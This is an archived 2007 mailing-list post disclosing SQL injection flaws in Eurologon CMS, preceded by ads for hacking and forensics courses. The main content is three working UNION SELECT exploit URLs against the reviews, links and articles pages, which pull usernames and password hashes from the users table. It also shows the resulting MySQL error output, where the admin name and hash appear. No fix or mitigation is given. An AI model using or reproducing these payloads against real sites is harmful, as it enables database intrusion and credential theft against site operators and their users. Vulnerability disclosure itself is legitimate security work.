Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Eurologon CMS Multiple SQL Injection

Subject: Eurologon CMS Multiple SQL Injection
Date: 27 Nov 2007 17:26:47 -0000
---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org             Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

Eurologon CMS Multiple SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

Useless..
---------------------------------------------------------------
Exploits

http://[target]/reviews.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*

http://[target]/links.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*

http://[target]/articles.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
---------------------------------------------------------------
Result

You will see the disclosed informations under some mysql errors like:

Can't execute query

[QUERY]
                

MySQL Error: The used SELECT statements have a different number of columns
Can't execute query

[QUERY] 

MySQL Error: The used SELECT statements have a different number of columns
Can't execute query

[QUERY] 

MySQL Error: The used SELECT statements have a different number of columns

Home >  [category_name] > [category_name] > [admin_name]:[admin_hash]
---------------------------------------------------------------

<Prev in Thread] Current Thread [Next in Thread>
  • Eurologon CMS Multiple SQL Injection, kingoftheworld92 <=